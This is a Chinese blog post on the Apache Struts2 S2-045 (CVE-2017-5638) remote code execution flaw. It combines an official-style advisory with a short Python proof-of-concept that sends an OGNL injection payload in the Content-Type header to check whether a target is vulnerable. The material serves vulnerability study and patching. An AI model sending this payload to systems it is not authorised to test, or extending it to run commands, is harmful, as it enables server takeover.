Struts漏洞介绍与分析

最新推荐文章于 2024-02-20 01:01:56 发布
最新推荐文章于 2024-02-20 01:01:56 发布
阅读量689 收藏 1
点赞数 1
文章标签: struts 漏洞 信息安全 s2-045
本文介绍了Apache Struts2 (S2-045) 远程代码执行漏洞的相关信息,包括漏洞简介、危害分析及修复措施。攻击者通过发送恶意HTTP请求可在受影响服务器上执行任意命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Struts-045学习

关于Apache Struts2(S2-045)漏洞情况的通报
近日,国家信息安全漏洞库(CNNVD)收到关于Apache Struts2 (S2-045)远程代码执行漏洞(CNNVD-201703-152)的情况报送。由于该漏洞影响范围广,危害级别高,国家信息安全漏洞库(CNNVD)对此进行了跟踪分析,情况如下:

一、 漏洞简介

Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts 2。

ApacheStruts 2.3.5 – 2.3.31版本及2.5 – 2.5.10版本存在远程代码执行漏洞(CNNVD-201703-152 ,CVE-2017-5638)。该漏洞是由于上传功能的异常处理函数没有正确处理用户输入的错误信息。导致远程攻击者可通过发送恶意的数据包,利用该漏洞在受影响服务器上执行任意命令。

二、 漏洞危害

攻击者可通过发送恶意构造的HTTP数据包利用该漏洞,在受影响服务器上执行系统命令,进一步可完全控制该服务器,造成拒绝服务、数据泄露、网站造篡改等影响。由于该漏洞利用无需任何前置条件(如开启dmi ,debug等功能)以及启用任何插件,因此漏洞危害较为严重。

三、 修复措施

目前,Apache官方已针对该漏洞发布安全公告。请受影响用户及时检查是否受该漏洞影响。

自查方式
用户可查看web目录下/WEB-INF/lib/目录下的struts-core.x.x.jar 文件,如果这个版本在Struts2.3.5 到 Struts2.3.31 以及 Struts2.5 到 Struts2.5.10之间则存在漏洞。

升级修复
受影响用户可升级版本至Apache Struts 2.3.32 或 Apache Struts 2.5.10.1以消除漏洞影响。

临时缓解
如用户不方便升级,可采取如下临时解决方案:
l 删除commons-fileupload-x.x.x.jar文件(会造成上传功能不可用)。

四、PoC示例

requests库学习

  • Requests 是用Python语言编写,基于 urllib,采用 Apache2 Licensed 开源协议的 HTTP 库。它比 urllib 更加方便,可以节约我们大量的工作,完全满足 HTTP 测试需求。Requests 的哲学是以 PEP 20 的习语为中心开发的,所以它比 urllib 更加 Pythoner。更重要的一点是它支持 Python3 哦!
  • Requests 使用的是 urllib3,因此继承了它的所有特性。Requests 支持 HTTP 连接保持和连接池,支持使用 cookie 保持会话,支持文件上传,支持自动确定响应内容的编码,支持国际化的 URL 和 POST 数据自动编码。现代、国际化、人性化。

sys库学习

  • Python的系统模块
    包括sys, os, glob, socket, threading, _thread, queue, time, timeit, subprocess, multiprocessing, signal, select, shutil, tempfile等。
    大多数系统级接口集中在:sys和os两个模块。

下面是测试PoC脚本1

import requests
import sys

def poc(url):

    payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"

    headers = {}

    headers["Content-Type"] = payload

    r = requests.get(url, headers=headers)

    if b"105059592" in r.content:

        return True


    return False



if __name__ == '__main__':

    if len(sys.argv) == 1:

        print ("py " + sys.argv[0] + " targetUrl")

        sys.exit()

    if poc(sys.argv[1])==True:

        print ("vulnerable")

    else:

        print ("not vulnerable")
James_zjm
关注
struts1漏洞总结及整改方案
08-07
因为最近攻防演练,对公司的资产进行梳理,发现部分应用还使用的struts1框架,所以赶快收集整理了相关的漏洞以及相关的整改方案。提供给大家。
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.322.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apache.struts/struts2-spring-plugin/2.3.32
struts2漏洞利用工具V1.41
11-03
struts2漏洞利用工具V1.41 请遵守网络安全法,该工具仅用于研究学习和网络管理员安全检测,不要用于任何非法用途,工具使用造成的后果本人无关 新版开发计划:1、执行任意jar包2、学习模式提交,可修改任意参数 1.4版新功能, 1、上传二进制文件的支持 2、多编码支持 3、修复上传功能的BUG 4、加入COOKIE设置支持
关于struts漏洞
BeALittleCat的专栏
02-15 1144
(文章出处:阿里云社区  漏洞扫描 > 技术运维问题 > 技术分享 > Struts2代码执行漏洞) Apache Struts s2-005 远程代码执行漏洞(CVE-2010-1870)  受影响版本: Struts 2.0.0 - Struts 2.1.8.1 漏洞描述: 在Struts2中访问OGNL的上下文对象必须要使用#符号,S2-003的修复方案中对#号
Struts框架漏洞
小小猪的博客
08-18 1395
Struts框架漏洞 Struts-S2-013漏洞利用 不妨先来看下index.jsp中标签是怎么设置的 <p><s:a id="link1" action="link" includeParams="all">"s:a" tag</s:a></p> <p><s:url id="link2" action="link" includeParams="all">"s:url" tag</s:url></p&
全网最全Struts 2 全版本漏洞检测工具,最新struts漏洞更新
04-18
3. **配置文件审查**:分析Struts配置文件(struts.xml或类似的配置文件),寻找可能导致安全风险的设置。 4. **依赖库审计**:检查项目依赖的Struts 2和其他相关库的版本,确认是否为已知漏洞的版本。 5. **动态...
Struts2 漏洞分析及如何提前预防
09-02
然而,Struts22016年4月26日发布了一份关于CVE-2016-3081的安全公告,揭示了一个严重的远程命令执行漏洞,该漏洞被称为S2-032。这个漏洞发生在Struts2框架的动态方法调用功能中,允许攻击者通过精心构造的请求执行...
Struts2漏洞检查工具Struts2.2019.V2.3
01-25
"Struts2漏洞检查工具Struts2.2019.V2.3"是一个专门针对这些漏洞进行检测的工具,旨在帮助开发者和网络安全专业人员识别并修复Struts2框架中的安全问题。 Struts2的安全漏洞主要包括以下几类: 1. OGNL(Object-...
Struts2漏洞检查工具2018版.rar
03-31
描述中提到的"Struts2各版本漏洞扫描利用工具"表明该工具不仅能够扫描Struts2应用的漏洞,还可能包含了一些漏洞利用的模块。这可能是为了进行安全测试,模拟黑客可能采取的攻击手段,以便于防御。 在标签中,“漏洞...
Struts2漏洞检查工具2018版.zip
04-04
总之,Struts2作为一个强大但可能存在安全风险的框架,需要开发者和运维人员具备扎实的安全知识,以确保其在生产环境中的稳定安全。使用如"Struts2漏洞检查工具2018版"这样的工具,是主动防御和及时发现安全隐患的...
Struts2漏洞分析漏洞波及全系版本
445822357
10-31 595
Struts漏洞分析 Apache Struts团队已经发布了Struts 2.3.15.1安全更新版本。在Struts2.3.15.1版本之前,存在着严重的安全漏洞,如果现在一些比较大的网站是用JAVA做的,没有把版本升级,还用的是Strtus2.3.15.1版本之前的话,那么你们就要小心,服务器被黑了哦。 下面就来说一下之前版本,Struts2漏洞是如何产生的,我们自己去做,该如何的...
struts漏洞
MoYanHanHuiLengMa的博客
07-19 673
struts.devModel 是struts的开发模式  默认值是false                        产品模式                                                                          true                          开发模式(优点:明显提高开发效率。会提供更多的日志和de
struts 漏洞
weixin_30610755的博客
04-27 126
安装shop++ 安装成功 访问 http://127.0.0.1:8080 即网站首页 访问 http://127.0.0.1:8080/admin 即网站后台 转载于:https://www.cnblogs.com/n00p/p/8962976.html
Struts1.x 跨站脚本(XSS)漏洞的解决
weixin_33862514的博客
11-18 288
一. 演示XSS 当访问一个不存在的网址时,例如[url]http://localhost:8080/demo/noAction.do[/url],那么Struts处理后都会跳到提示“Invalid path /noAtcion.do was requested”的页面。 但如果我们访问的网址是[url]http://localhost:8080/demo/<s...
Struts2漏洞
最新发布
2403_82795493的博客
02-20 4075
Struts 是Apache软件基金会(ASF)赞助的一个开源项目,通过采用JavaServlet/JSP技术,实现基于Java EEWeb应用的MVC设计模式的应用框架Struts 2Struts的下一代产品,是在 Struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架Struts2框架广泛应用于政府、公安、交通、金融行业和运营商的网站建设,作为网站开发的底层模板使用。
Struts2漏洞 - Struts2-015 Struts2-016 Struts2-045
HAKUNAMATATATTA的博客
12-21 3104
Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts2Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型视图的数据交互。
struts2漏洞
热门推荐
qq_52527336的博客
06-30 1万+
记一下笔记一个个写吧
重现Struts1的操纵classLoader漏洞
sunxing007的专栏
05-15 7830
注:本文仅限技术研究,探讨,测试使用 2014年4月29日爆出的struts的可操纵classLoader的漏洞, 横跨struts1和struts2的所有版本。 影响面和问题的严重性几乎可以和heartbleed相媲美。 struts2要严重一些,对于struts1,只是说在特定条件下可执行特殊操作。 因为项目中用的是struts1,所以主要精力集中在struts1上。既然要修复漏洞
STRUTS2 getClassLoader漏洞深度分析
Struts2框架中,当用户提交的请求参数Action类的字段匹配时,Ognl会尝试自动映射这些参数到Action对象的相应字段。正常情况下,由于Struts2默认只处理基本数据类型的映射,如果攻击者尝试将非基本类型的值赋给一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值